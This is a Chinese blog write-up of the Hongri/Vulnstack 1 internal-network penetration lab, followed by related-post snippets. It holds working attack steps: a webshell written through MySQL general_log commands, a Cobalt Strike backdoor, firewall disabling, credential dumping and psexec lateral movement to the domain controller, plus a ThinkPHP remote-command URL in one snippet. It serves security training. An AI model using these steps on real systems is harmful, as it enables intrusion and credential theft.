内网渗透---红日靶场1

已于 2024-09-18 16:28:14 修改
阅读量804 收藏 24
点赞数 20
文章标签: 安全
于 2024-09-18 16:22:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73212565/article/details/142331557
版权

一、环境搭建

官方下载地址及相关信息:​​​漏洞详情

下载后有三台虚拟机,默认密码为:hongrisec@2019

  • win7增加一张网卡,一张外网为NAT,另一张内网为VMnet1(仅主机模式)
  • Windows server2008和win2K3的配置都是VMnet1: 
  •  
  • 配置好即可登录,登录时提示密码过期需更改密码--->win7需打开phpstudy(外网服务器)
  • 主机可以搜索到win7phpstudy探针
  •  各机ip如下:

win7         IP:192.168.50.210(外网)
                        192.168.52.143(内)

win2008           192.168.52.138(内)

win2003           192.168.52.141(内)

kali                   192.168.50.218(攻击机)

 靶场环境搭建完毕。

二、WEB渗透

 1、信息收集

  • 通过nmap扫描,可以发现开放了80端口和3306端口
nmap -A -p- 192.168.50.210

  • 通过dirsearch扫描目录,发现有phpmyadmin,爆破后帐号/密码为:root/root
dirsearch -u http://192.168.50.210/

 2、木马植入

  •  通过简单查询,获得到网站的绝对路径   
  •              
  •  尝试木马植入,但未果。
  • 通过查询得知,secure_file_priv的值为NULL,说明不能使用into outfile的方式写入shell。
  •  尝试日志写入shell,查看日志状态,默认为关闭状态:

  • 开启日志,并将MYSQL的通用查询日志的输出文件设置为指定的路径:

SET GLOBAL general_log = 'ON'
SET GLOBAL general_log_file = 'C:/phpstudy/www/1.php'

 

  •  写入一句话木马:SELECT '<?php @eval($_POST["cmd"]);?>'                                       
  • 植入成功
  • 使用蚁剑链接刚刚上传的木马目录
  • 上线成功3

3、使用蚁剑+CS

  • kali打开服务端,CS链接
  • 创建监听器​​​​​​
  •  创建Windows可执行exe程序,有效载荷-->win可执行程序-->监听器选择刚刚创建的web--->将后门保存到桌面--->利用蚁剑上传到phpstudy/www目录下

 

  •  在蚁剑终端运行:stat web.exe--->上线成功

三、内网渗透

1、提权:administrator-->system

  •  顺便改一下回连间隔,改为5
  •  上线后关闭防火墙
shell netsh advfirewall set allprofiles state off

2、内网信息收集

  •  查看网络适配器 shell ipconfig
  •  查看本地用户 shell net user
  •  查看计算机名 shell net view
  • 查看有几个域 shell net view /domain 
  •  抓取明文密码:右击system--->凭证提权--->抓取明文密码

 3、内网横向

kali端口扫描的时候发现开放了445端口,可以在CS上创建SMB监听隧道。

SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。

  •  建立SMB监听器
  •  切换攻击目标列表--->右击--->横向移动--->psexec

成功进入域控 

想吃炸鸡TAT
关注
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2241
红日靶场渗透教程
红日内网渗透靶场vulnstack2
snowlyzz的博客
09-20 1207
红日渗透二学习
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 5571
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
一次简单的内网靶场渗透
weixin_46330465的博客
02-19 1696
本套靶场来源于渗透攻击红队。大佬勿喷,请多多指教。
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 4336
红队靶场内网渗透(从DMZ主机渗透到域内机器)
CH4INRULZ_v1.0.1内网渗透靶场
weixin_51339377的博客
03-17 529
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通过御剑进行扫描 http://192.168.206.146/index.html.bak frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 通过工具john进行一下解密 把解密结果存储到相应文件中 cd ...
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
最新发布
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
2024年最新Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297265的博客
05-03 1730
该内网靶场的渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行域命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 2897
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 7290
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
简单的内网渗透靶场实战(tp漏洞、msf、psexec横向渗透、权限维持)
weixin_41489908的博客
07-30 3095
​ 前言环境搭建web服务器渗透nmap探测端口thinkphp getshellthinkphp批量检测内网信息搜集内网渗透上线msf信息搜集获取凭证思路内网横向移动MS17-010尝试psexec尝试ipc连接关闭域控防火墙psexec尝试*2登录远程桌面权限维持DSRM后门日志清除 1 前言 在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。 2环境搭建 靶场: win7(内):192.168.138...
记一次内网靶场渗透测试
m0_60571990的博客
10-13 1279
记一次内网靶场渗透测试
内网渗透之CFS三层靶场渗透
yc11223344的博客
12-19 1126
1.在连接target2的时候代理总是断开,反弹不了shell,后来重新启动msf,重新配置,最终获得了shell2.proxychains4使用不了sqlmap,不清楚什么原因。
三层内网渗透笔记-靶场(teamssix.com)
mingyqf的博客
02-02 832
渗透流程参考:https://mp.weixin.qq.com/s/oa_7YBrvtCRIYlBbwcqoVQ,部分截图引用该公众号。
【网络安全】DVWA靶场实战&BurpSuite内网渗透
九芒星的博客
07-22 6307
借助DVWA靶场,对用户登录进行渗透测试
内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3729
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
记一次内网渗透(ATT&CK第五个攻防靶场
a168xzy的博客
12-10 1762
记一次内网渗透(ATT&CK第五个攻防靶场靶场下载地址:download 渗透测试 拿到题目打开是一个thinkphp框架 测试thinkphp版本 找到此版本漏洞的poc 可以命令执行 http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 查看当前路径 http://192.1
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值